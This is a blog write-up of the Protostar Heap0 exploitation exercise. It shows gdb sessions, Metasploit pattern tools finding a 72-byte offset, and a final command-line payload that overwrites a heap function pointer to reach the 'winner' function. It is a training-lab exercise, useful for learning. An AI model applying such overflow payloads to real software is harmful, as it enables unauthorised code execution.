Protostar Heap0 – Brushing up on Heap Exploitation

I haven't written about any binary exploitation in a while, so I decided to do a write-up for Protostar Heap0 on Exploit Exercises.

Protostar Heap0 - Introduction

I picked Heap0 in particular because I know that my heap skills are definitely lacking when compared to the stack. That, combined with LiveOverflow's Use-after-free tutorial for Heap2 pushed me towards working through these.

Program Analysis

To start, I downloaded the code from the challenge's page. I decided to perform everything locally, as I didn't want to worry about having to download and setup a VM for the time being.

Once I had the code on my machine, I compiled it and took a glance at its basic usage.

root@kali:~/Documents/exploit-exercises/protostar# gcc -o heap0 -fno-stack-protector -m32 heap0.c 
heap0.c: In function ‘main’:
heap0.c:32:9: warning: assignment from incompatible pointer type [-Wincompatible-pointer-types]
   f->fp = nowinner;
         ^
root@kali:~/Documents/exploit-exercises/protostar# ./heap0 
data is at 0xe4e010, fp is at 0xe4e060
Segmentation fault
root@kali:~/Documents/exploit-exercises/protostar# ./heap0 'A'
data is at 0x9a2010, fp is at 0x9a2060
level has not been passed

Exploitation

Since name was only a 64 byte buffer, I wanted to see if a 100 character string would overflow it.

root@kali:~/Documents/exploit-exercises/protostar# gdb heap0 
GNU gdb (Debian 7.11.1-2) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from heap0...(no debugging symbols found)...done.
(gdb) r `python -c 'print "A" * 100'`
Starting program: /root/Documents/exploit-exercises/protostar/heap0 `python -c 'print "A" * 100'`
data is at 0x804b008, fp is at 0x804b050

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

As I expected, I was able to overwrite EIP with my A's. Next I created a pattern to find the appropriate offset for EIP.

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

< ... snip ... >

(gdb) r 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'
Starting program: /root/Documents/exploit-exercises/protostar/heap0 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'
data is at 0x804b008, fp is at 0x804b050

Program received signal SIGSEGV, Segmentation fault.
0x41346341 in ?? ()

I then loaded my new EIP into pattern_offset and got an offset of 72 characters.

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb -q 0x41346341 -l 100
[*] Exact match at offset 72

Once I verified that my offset of 72 was correct, I was able to overwrite EIP with my "BBBB" string.

(gdb) r `python -c 'print "A"*72 + "BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Documents/exploit-exercises/protostar/heap0 `python -c 'print "A"*72 + "BBBB" + "C"*24'`
data is at 0x804b008, fp is at 0x804b050

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

The only thing left for me to do was obtain the address for the "winner" function, which was as simple as running a print command.

(gdb) print winner
$1 = {<text variable, no debug info>} 0x804849b <winner>

With everything in place, I was able to write my full exploit and pass the level!

root@kali:~/Documents/exploit-exercises/protostar# ./heap0 `python -c 'print "A"*72 + "\x9b\x84\x04\x08"'`
data is at 0x8d59008, fp is at 0x8d59050
level passed

Protostar Heap0 - Conclusion

While Protostar Heap0 was a simpler exercise, I'm hoping to continue working through the rest of the heap challenges.

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.